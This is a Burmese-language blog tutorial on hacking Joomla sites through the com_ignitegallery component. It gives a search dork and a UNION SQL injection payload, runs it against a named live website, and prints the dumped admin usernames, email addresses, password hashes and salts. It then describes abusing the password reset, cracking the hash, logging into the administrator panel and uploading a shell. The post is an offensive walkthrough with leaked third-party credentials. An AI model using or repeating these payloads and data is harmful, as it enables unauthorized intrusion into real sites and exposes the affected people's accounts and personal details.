Joomla Exploit (injection)

 ဒါေလးကေတာ့ အစ္ကိုတစ္ေယာက္ေျပာလုိ သြားျပီးသတိရတာနဲ ့တင္ေပးျဖစ္သြားတာပါ။ သက္ဆုိင္သူအစ္ကိုေရ။ joomla website ကို ရွိသမွ် အေကာင့္ကိုရသေလာက္ ညီေလးတုိ ့စမ္းၾကတာေပ့ါ။

inurl:"index.php option=com_ignitegallery"

ကဲစလုိက္ရေအာင္ဗ်ာ.။

ဥပမာအေနနဲ ့ ..
http://www.kaikourafishing.co.nz/index.php?option=com_ignitegallery&task=view&gallery=
ကို ကြ်န္ေတာ္ကေရႊးထားပါတယ္။



injection ထုိးတတ္သူေတြကေတာ့ ထုိးခ်င္သပါ့ဆုိထုိးၾကပါ ကြ်န္ေတာ္ကေတာ့ ရုိးရုိးေလးသြားမွာမုိ ့ပါ။

ဒီေတာ့ လင့္ေနာက္မွာ ေအာက္က exploit ကိုထပ္ေပါင္းထည့္ေပးပါ။


-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--
ဒီလုိေလးေပ့ါ။

http://www.kaikourafishing.co.nz/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10+from+jos_users--

ပာဲပာဲ အေတာင့္လုိက္ေတြထြက္လာျပီ ဇြဲမေလ်ွာ့နဲ ့ထပ္ကစ္မယ္အားတင္ထား

62:Administrator:admin:wurmik@digitalarts.co.nz:23685093d2d80eec935688c715a8df45:HbbMS87F960QIBpjRcUtGb2TPxY6jz95:Administrator,63:Digital Arts:digitalarts:info@digitalarts.co.nz:3c7afd2292cd46576847a5932c615450:unOI20muLkd5dBl5Q9C5B5Ps7LJDcYQW:Super Administrator,64:Kevin:kevin:inkworx@gmail.com:70a4576cf2cd2dc5050e16e94f3a042a:3my9HR7objofDq8TfZeX78SkzcivEU3P:Super Administrator,65:Kaikoura Fishing Charters:kaikou:kkfishingcharters@xtra.co.nz:c92b89dcfe0edf7671f517fef67903cd:Qb6weni25Op47AWGuQW29E3UwnP6mizc:Super Administrator

ခိခိ အကုန္ေပာာင္းေလာင္းၾကီးဘဲ။ သက္ဆုိင္သူ အစ္ ကိုေျပာတဲ့  spuer admin အေတာင့္ၾကီးပါထြက္လာျပီ။ ကဲ ညီကိုတုိ ့ေရ စလုိက္ရေအာင္ ..။

အခုရထားတဲ့ ပာာေတြက မတည္ျမဲေသးပါဘူး။ ခုန္တတ္ၾကေသးတယ္ေလ။
ဒီေတာ့ ပာဲပာဲ password restart ခ်ပစ္မယ္။ ကြ်န္ေတာ္ ေျပာခဲ့သလုိဘဲ joomla site ေတြက restart မိတာမ်ားတယ္ဆုိတာကိုပါ။ အခု စမယ္အစ္ကိုတုိ ့ေရ...

www.someone.com//index.php?option=com_user&view=reset

လုိေပ့ါ။

http://www.kaikourafishing.co.nz//index.php?option=com_user&view=reset

သြားလုိက္ပါ email လိပ္စာေတာင္းပါလိမ့္မယ္။ ခုဏက ေခ်ာင္းၾကည့္ထားတဲ့ အေကာင့္တစ္ခုထည့္လိုက္။
admin account ထည့္ေနာ္..
wurmik@digitalarts.co.nz
လုိ ့ထည့္လုိက္ပါမယ္။
ျပီးရင္ေတာ့ sumib ကိုနုိပ္ခ်လုိက္။  ဒီအခ်ိန္မွာ အက္မင္ထံကို ပတ္စေပ့ါ အသစ္ပုိ ့လုိက္ပါျပီ။ ၾကားဖ်က္ေခ်ာင္းၾကတာေပ့ါဗ်ာ။. ဘယ္လုိေခ်ာင္းမလဲဆုိေတာ့ injection ထုိးျပီး ပတ္ပတ္ေတြ(ပတ္စေပ့ါေတြ) အေတာင့္လိုက္ ထြက္တဲ့ လင့္ကိုျပန္သြားမယ္။
(ေၾကာင္မေနနဲ ့ ေအာက္ကလင့္ကိုသြားလုိက္x)


http://www.kaikourafishing.co.nz/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10+from+jos_users--

ေသခ်ာၾကည့္ေနာ္။ ပထမ တုန္းက wurmik@digitalarts.co.nz ပတ္စေပ့ါနဲ ့အခု ထပ္ေခ်ာင္းၾကည့္တဲ့ပာာေလးနဲ ့ေပ့ါ။
ကဲ ေဘာ္ဒါတုိ ့ md5 cracker ေလးနဲ ့ ေျခခ်လုိက္ဗ်ာ။(Crack လုိက္ပါx)
ပာိာိ ျပီးသြားရင္ ရတဲ့ပတ္စေပ့ါနဲ ့

www.someone.com/administrator

ဒီလုိေလးေပ့ါ

http://www.kaikourafishing.co.nz/administrator/

Login ၀င္ခ်လုိက္ပါ။ ဒီေနရာမွာ တစ္ေယာက္စမ္းတစ္မ်ဳိးေျပာင္းျဖစ္ေနမွာမုိ ့ပတ္စေပ့ါအတည္မရနုိင္ပါဘူး။

ကိုစမ္းလုိ့ ရတဲ့ပုံစံနဲ ့၀င္ေပ့ါ။ျပီးရင္ sh3ll တင္ sym ပတ္ခ်လုိက္။အဲမပတ္ခင္ ဘုရားရွိခုိးလုိက္အုံး။

website အမ်ားၾကီးပါလာပါေစလုိ ့။ ပာိာိ။

ကဲအားလုံးဘဲ ေစာ္ၾကည္ေတာ္ကီ တတ္ျပီး ေဂၚလီလုပ္နုိင္ၾကပါေစ။
(ဘာမွလည္းမဆုိင္ဘူးေနာ္၊၊x)

တကယ္လုိ ့မ်ား ကြ်န္ေတာ့ကိုဆက္သြယ္ခ်င္တယ္ဆုိရင္ေတာ့ kominsoeyarsar@gmail.com ကိုအခုလက္ရွိ ကြ်န္ေတာ္သုံးေနပါတယ္။ နည္းးပညာပုိင္းဆုိင္ရာေမးနုိင္ပါတယ္။ သိရင္ေတာ့ သိသလုိေျဖေပးပါ့မယ္။ လုိခ်င္တဲ့ software မ်ားလည္းေတာင္းနုိင္ပါတယ္။ ဒီေန ့ေတာင္နက္ျဖန္ ဆုိဒ္ေပၚေရာက္ေအာင္ အတတ္နုိင္ဆုံးၾကိဳးစားတင္ေပးပါ့မယ္။
အခုဒီဘေလာ့ေလးက အစ္ကိုတစ္ေယာက္နဲ ့စကားေျပာရင္းပန္သတိရျပီးတင္ေပးလုိက္တာပါ။

Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →

Powered By: BloggerYard.Com